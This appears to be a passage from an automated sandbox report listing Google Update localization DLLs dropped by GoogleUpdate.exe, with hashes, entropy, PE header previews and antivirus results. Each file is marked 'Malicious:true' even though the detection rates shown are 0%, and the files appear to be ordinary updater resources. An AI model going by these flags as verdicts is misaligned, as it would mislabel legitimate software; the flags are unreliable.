                                      SSDEEP:384:UgrvUx7tVF7qTFoFrTFgRj+mBwmhIYi6yfSeTAM+o/8E9VF0Ny7Z:Zru0FoFXFWBwm2Yi6ytAMxkED
                                      MD5:64ED14E0070B720FCEFE89E2AB323604
                                      SHA1:495C858C55151E2400A1A72023AA62216033F928
                                      SHA-256:635F3A7FD3C1F62EB91117189AC84E1A1E5C3A8E104863D125C16E8BE570E3D1
                                      SHA-512:4FAB73DE11E595C7E4EDD9A66137F8E7B0B13DB1799DBE4C10DD766783079D38D560C6CC1BF9AF4BC1ABD71F1706643BD9A31C0F58E55DF3D0DD7D739E1480B7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...x.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....x...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.598811412978355
                                      Encrypted:false
                                      SSDEEP:384:T54e2yrzVu/k4bHoQIYi6ye2JQAM+o/8E9VF0NyeHVxx:d4e2yrBuVo5Yi6yTJQAMxkE2Vxx
                                      MD5:BA783AC59839551280618C83C760D583
                                      SHA1:53D1D10955E322A6135B047EECD88A4815F9B6DA
                                      SHA-256:C2D15F8DA32907D8CEA1AAA0D51F16BC692A74141FDACE43A84C78647433A086
                                      SHA-512:A635D52C20164A02DC3FC4DDB961BF36177014E0CB27E50588013A0E9F3787194DE3C9DA160672B62B25EB94DDCEA366BCAA44B6BFA593DA77C97ABA48F8A50B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...x.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....x...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.649122419825438
                                      Encrypted:false
                                      SSDEEP:384:QcO4BWDqBkwEAuf26IYi6yhRdAM+o/8E9VF0NyBy:3OPj2HYi6yNAMxkE
                                      MD5:8041B1DB1F5A00DC1A617F02D9CD9744
                                      SHA1:963BB4E81134089D12B26AD1631BB0825E9B8FA3
                                      SHA-256:C823D54A7777E3CB0FF2BBEC829833F0AD5BFBE58290AF02E0F85A877DB50FB7
                                      SHA-512:BFA81A184E2985E2755C941137562C40AD4903A9B883F84471FF10636C363BE909DB0044BB4320C1FB615303EE375D64675A894ABE08414FF1C0A5DA0E22D450
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................$.....@.............................I....0..(....@..@u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...@u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.605474690624573
                                      Encrypted:false
                                      SSDEEP:384:ThmfN3wtpOcqJ4UIYi6y3vMAM+o/8E9VF0Nyym:tS3wxo4lYi6ykAMxkE
                                      MD5:13BB66CF80AEA019219F9181496B5B74
                                      SHA1:8BBD83FFF1BCDC01E93ED263B8564519A7C6FE7C
                                      SHA-256:C9E878E8C3A2EBE17DF25C3406A0C449D93E56620E3006E83CE777952F47A488
                                      SHA-512:E7C84E8C600767CB4DF43B9ED1C5220BECDE79C32F832158BD78368EC9B04422F272715BBCA5A261DA967FCB019DBF01D154467C77D2775E46E19AB3F6D64F9C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ............................................@.............................I....0..(....@..hu.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...hu...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):46368
                                      Entropy (8bit):4.593598830627038
                                      Encrypted:false
                                      SSDEEP:384:BRmUy8gjhO4MesINK/QxSIYi6y90tQAM+o/8E9VF0NyDfcrX:HA1MeZsQx/Yi6y1AMxkE9crX
                                      MD5:C1DD450C8F536604579902FB23013233
                                      SHA1:AE60094A4A1A2A33624A65B0CE3132A77DE6C6E6
                                      SHA-256:A8422F753E831EA71C41867CFDC767FCBC05874FC039A0101BD05C571F8D822B
                                      SHA-512:35AB265A6363856E40156185BFFB93D6481EA321F63A033160847CB88CC0764A18F14F9A72265E2F1F9CAEFF4702EFDD147A46B23614FCE090E08B78CD3EBC4F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...|.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....|...@...~..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.897059533677385
                                      Encrypted:false
                                      SSDEEP:384:vr7EDleILkSIuHCSqlIxRFiAhkg8zBdfsBsTbMaIYi6yWhKOxJAM+o/8E9VF0NyE:TYZlLOWR5m/0nYi6yQKIAMxkES
                                      MD5:59BA1742A224CB96C89CA335FF208409
                                      SHA1:2B595FEED6EFE926CC87C16534C3B8BAFC511CDB
                                      SHA-256:2836EC2D0830B66F281D65CB24F9EA2311E6464F13D4D0E41547BE5CE994582E
                                      SHA-512:A4E7BD47AF97387EF0828DAA4D1B6F820FAEF02C28E77DDA0DA08E0A4766F2BEAC42D4AC5DFEC82E7C3FD1A39E9D6A1359D45750EBCE4C0E6722567B1DF6E919
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...{.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....{...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.602499788630145
                                      Encrypted:false
                                      SSDEEP:384:B011yagyXbuTTIYi6yi57zAM+o/8E9VF0NyOZ8:UyagyXqTcYi6yIAMxkEz
                                      MD5:68420A06AD032BD6A79B2472C3350476
                                      SHA1:4E301F757C209DC928AB05370A51ABCA66BD38D8
                                      SHA-256:BBD19A75809F516726289377F97D67AE5F9122FDAD0AD9F34974CBBBC91B9968
                                      SHA-512:9829CB34552D85B99441273174E801F401B1D7DF3C7140E8BBDB74B77008E3E258BBAFAB2AFB3F01F7909198C1376A3AE9360C941C7DF60AD49309FB916B5F8F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ ......................................7'....@.............................L....0..(....@...q.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....q...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.597501302210217
                                      Encrypted:false
                                      SSDEEP:384:hN3zagyMeRTcIYi6yNfAM+o/8E9VF0Nyv2K:7zagyMeTNYi6yhAMxkERX
                                      MD5:0D30A76BBCBC637382FAD5A927297A2F
                                      SHA1:39DBD1BCB5372E06AA4FFA3A6FE0010BF8652517
                                      SHA-256:DC22CBD055CFAE79301C7906CA1E2A1E926AAF943FB11D8060B91202BD5759AA
                                      SHA-512:1D73F9A223FF1D292A4886C1377A2DCA0459B6F757F814D73E66746F25B4E97FBAF90188D96CC1829BC9A288B5A118FF472FABB1C401994B1524D70E92953F8D
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ ............................................@.............................I....0..(....@..xq.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...xq...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.589128614101453
                                      Encrypted:false
                                      SSDEEP:384:+Bphfy4xLIYi6yzK1IuAM+o/8E9VF0NyUYz:2phfy4x0Yi6ymIuAMxkE3
                                      MD5:4A28036303C7F36827A757D0950669B1
                                      SHA1:AF5FA8D2DBBD8F8BDAC508F187731CF33FF8B960
                                      SHA-256:0047475C9353A570604D437D8985CEBC7230B26F010EF30F4176F93F0C2361B4
                                      SHA-512:B5EAF77B729142ABC233974C3900C39CD75FD2252E8ED49059BFE607D2B1C74B28F347B86793AA8E5A12C87701BFCE8E9C87D34E262DF7BE559ECBD0F56E9C0F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................l........ ............................................@.............................M....0..(....@...v.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....v...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):46368
                                      Entropy (8bit):4.577924746396312
                                      Encrypted:false
                                      SSDEEP:384:t4sLNRaLElvnIYi6yF8AM+o/8E9VF0NyLl:WsLN2ElvIYi6yiAMxkE
                                      MD5:F49411F7F8FEB475EE096DB6A5938290
                                      SHA1:6926DDAF08B3F701FB357F032E76BB33E63F50F0
                                      SHA-256:E7A76D367BFFEA50A8F0B2F8DAEE91B3E5250431127A9DFDAA25980C39B22573
                                      SHA-512:0F95D6CF92882A30DEDF4B51BDA94CFF87DA327843569AA4F3C763FA2C658378795ADAEDBC3D93958128376E51D2D0792958DEF24A2E19C57D6717153D3512FF
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................o....@.............................I....0..(....@..x|.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...x|...@...~..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.587109826178785
                                      Encrypted:false
                                      SSDEEP:384:JeQrbDFbDuVEbJRzSQn/IYi6yx1AM+o/8E9VF0NyzCz:0s9umDnnAYi6yXAMxkE8z
                                      MD5:6D9E77D00E750D6C56784BD03DFE7137
                                      SHA1:E0C8E15ADFB6B3EFDC2EB1F7F3FBF5301D185EE6
                                      SHA-256:FEECECD2144DA0F8D7006695F2E915FEF34B1CF1C00C867E2A08CF8D9E5B5BC5
                                      SHA-512:8082E6BBF590212CDFD5B844557B66702E60220CD02D5850FB821A4A6527D4D5E82F1FA7595FAB01F76090E8992EBAB92DE614205DB4413FFB6BC48C9C10F185
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ............................................@.............................I....0..(....@..Hr.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...Hr...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.796897555990958
                                      Encrypted:false
                                      SSDEEP:384:WhOsQZbXQ54mWIYi6yoyPKAM+o/8E9VF0NyN3Wl:e34AYi6yJKAMxkEvWl
                                      MD5:66E75AAC042E5776513C1A20F360DF78
                                      SHA1:2916825A831048EAE55402371591221BE27EBA3B
                                      SHA-256:2528329F2177422671714B67C9D292E681791C26E6FCA8D3E99D92434F23D686
                                      SHA-512:6985D5004B6E919B7977C608BE044004D2C1AAFE1F855DD4B47DEDB2F3A22CB04608DF2C6079480B7CB3D08F8605C8AAD1B3279C78482AFD44280DB143508839
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ ............................................@.............................I....0..(....@...q.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....q...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.598852816619392
                                      Encrypted:false
                                      SSDEEP:384:i/gzfEUPhXY7RTYXU9hKh9GAH8IYi6ywgYfAM+o/8E9VF0NyhCQt:o2fEomQjHtYi6yEAMxkEJ
                                      MD5:0FF6B7BE8CCEAE26BD9ADE3914B987C3
                                      SHA1:6BB771E7C844CA501CBD1A05C0C19BB2078A784B
                                      SHA-256:52E75123D0C6CA6904A613AEBEF15DC9E662A7296089923EA690B4E627E5CBE9
                                      SHA-512:98E13A07D13691EB113AE63EFF36C7C9041582DDFFFB26F3918C0E87F484315930A0E924868C83DAB46349BC09DDDCB5BF0AE7A01155D9B1E2D90ABA5AC4834B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................S.....@.............................I....0..(....@...t.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....t...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.586244572418377
                                      Encrypted:false
                                      SSDEEP:384:3rRcUrPer+B3Rlaw7yNmIYi6yK8gAM+o/8E9VF0Nyc:7RcU7c+B3RlawWN7Yi6yCAMxkE
                                      MD5:B039877936C8BC88EFD93656E8E2FC3A
                                      SHA1:B27E928267E2B7085E45CF6F450BA8BCC0AF66E2
                                      SHA-256:7FFA28C0273C63AAD16D3AC3419144F5BB8CE3484BE73C45130927AA3ADA6E43
                                      SHA-512:26992D60966D56B64B0CA2047F9149BBAC8E6522D14AC2A9B2A4E57D5991F26A050E02FCB475243F0787221FC2307D5523F2C33B6ABC3F6C7AA5DAA1938F67F3
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................}....@.............................J....0..(....@...x.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....x...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.598368347361002
                                      Encrypted:false
                                      SSDEEP:384:CcN98EoMcpW4xwgIYi6yTUIIAM+o/8E9VF0NyPbCt:bNaMcNwpYi6ylIAMxkElC
                                      MD5:048033BD00459D6A545744BA1D46AB45
                                      SHA1:1F9CB02B84DA6B603B8BE9A717F4AE3F32CB3F4A
                                      SHA-256:52099330CDFDB45B04DB7BC0B2003762906AFDCA4CE16E7A33F0B4F7AEBEFE7B
                                      SHA-512:66A676C37E03DD326777534ABA889410A6ECF43E17A5F5736415A5BE179D4F8AEFD626A1F28B4869D3DD17A296B04EAA88D20C90796F9A9CFC3899007A08748C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ...........................................@.............................I....0..(....@...z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.8796776754691225
                                      Encrypted:false
                                      SSDEEP:384:O2/3UrpgV4DkYCQsfwDkIf4IYi6yDIYRRAM+o/8E9VF0Ny2v9A:1fUrpboufhYi6y8YRRAMxkE1
                                      MD5:9ACB142C6097BEF9A56847EAFF078A5C
                                      SHA1:D69D206D06DCF09B46B0E8BB47C177CB2A5BD8E6
                                      SHA-256:125B6EE3B4FEE064EABC9BAF671A366E4E88F68C97E582972CF741D914284628
                                      SHA-512:49F06023C4C70B75AABB81B586114704BC905480F4C0978E8D4315C232EA0B5D7D9545B7D02A9B24B71F72B066E926839908E2ACE1CCF245716E6EF2FCF1193C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................_!....@.............................I....0..(....@...z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.835993668654925
                                      Encrypted:false
                                      SSDEEP:384:sm65M6Ac6AbEcXwwExiIYi6y2eFAM+o/8E9VF0NynDWM:sh5M6Ac6AbEcXwwOvYi6yVAMxkEFWM
                                      MD5:8D62D3B71591FCB40F59B6D0F651614D
                                      SHA1:2C7B1831CEAD9E2ACB85CEBAF1C2C53784476F38
                                      SHA-256:AD368CA65DB3E0A9417634D6BD2AC81C38858F875C1CDC6D641C2389B99D5A59
                                      SHA-512:9AD0A199148EB21927C1EE3976FDE7BE2968063955B1A5526FE18B62BC12C3B4D6E2D7DAD7B5B1E8F76937733AE4A38289A32BCEBFE60AB50F0F80648CE80711
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ .......................................+....@.............................I....0..(....@..pu.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...pu...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.60146588810046
                                      Encrypted:false
                                      SSDEEP:384:gJxvNeXz1J2zMB5qBL/vogIYi6yg/zAM+o/8E9VF0NyOf:cxA5IL/vwYi6ycAMxkEs
                                      MD5:B9114CC4DE1128C5156E3AFC7F8123F0
                                      SHA1:FF0FE96553ADE4200D68305DD2E694DC91A2995D
                                      SHA-256:2846C112A3F0A3C6B050FBAC7EA96DD3733F117068A5CCCC8B6CF16EDE9D4C47
                                      SHA-512:3BB6519556CEF59D91AD92E11987AE6A36C9436CEE5FE79B2A08B24FBBC04207C1114D466C0DC05F63221B368CD13B818B0C87188FEB2511716A2AD75675A478
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................%.....@.............................I....0..(....@..@v.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...@v...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.633426748227514
                                      Encrypted:false
                                      SSDEEP:768:sg7U7oPX1C2TycfBwGFTbeSNp6931lBVZpOAy3FGVsLVYi6yLAMxkEY:sg7U7e1C2TzpwGFTbnp6d1lBVZ8Ay3Fa
                                      MD5:5601A611F2801A57025AC0F6725CE7E3
                                      SHA1:BD2F8D12A70B19546ADFD22FE6A590A4274D2669
                                      SHA-256:BD765A07250856C9ECB5A8319F04B9BDF4D2251827324AB5066B3D731B18AC18
                                      SHA-512:41EA26924EBF780E5D91FF8E5383D31B04076197B43BA964860556484B845E0590BF4CD805876CAFB7CFB3082002CB35454BFC34C55E17113D9778A73182BC38
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................}....@.............................I....0..(....@...v.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....v...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.58142334402398
                                      Encrypted:false
                                      SSDEEP:384:2Cmm5juSkAHqQ3lbZe2E9RyrUxFIYi6yKSkAM+o/8E9VF0NyRpZ:2pjARwxyYi6ysAMxkE3
                                      MD5:E8706AF39491F7A579A4A03D7E97EE86
                                      SHA1:2F0CB0DE6A34F368803003BC33F260137741D525
                                      SHA-256:15DBAD35E7FA0DCF3AC2F08ADBFB56981E3365F91D801C71F913FC0AB7C4CB52
                                      SHA-512:B3544F99CBFD0DEC7BD2B9169364CB2DAAC8AA388F24F27862DE71E4BCF40A24AE42900510AAD30CDCFDDD0594B62083CE67C9B573C8FE3A3055873FFAB7297A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ...........................................@.............................I....0..(....@..8r.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...8r...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.628156730390217
                                      Encrypted:false
                                      SSDEEP:768:yh6iBA06DkU3QF5EefV3oTYi6yEAMxkENd:yh6iBA06DkU3ubfVQ7qx5d
                                      MD5:D9BD75AD7A3A353CEE9C40044CE5B794
                                      SHA1:5CFAE92B010C7F15C0DE3FAA2D556501077EBA6C
                                      SHA-256:569AE0A08A78A956848B5A468247A02A0A0917657DE3DFD17EBD67CFC929F38D
                                      SHA-512:256C11F9C5ADC1EFB11A3EB0807226AFE72BDF02E6657104001B11C12961ACCD2E9CE4B7C6F8EC8DC577F8B25D6049F18F143786F2B9B5B2B9B6F14BB480B7EE
                                      Malicious:true
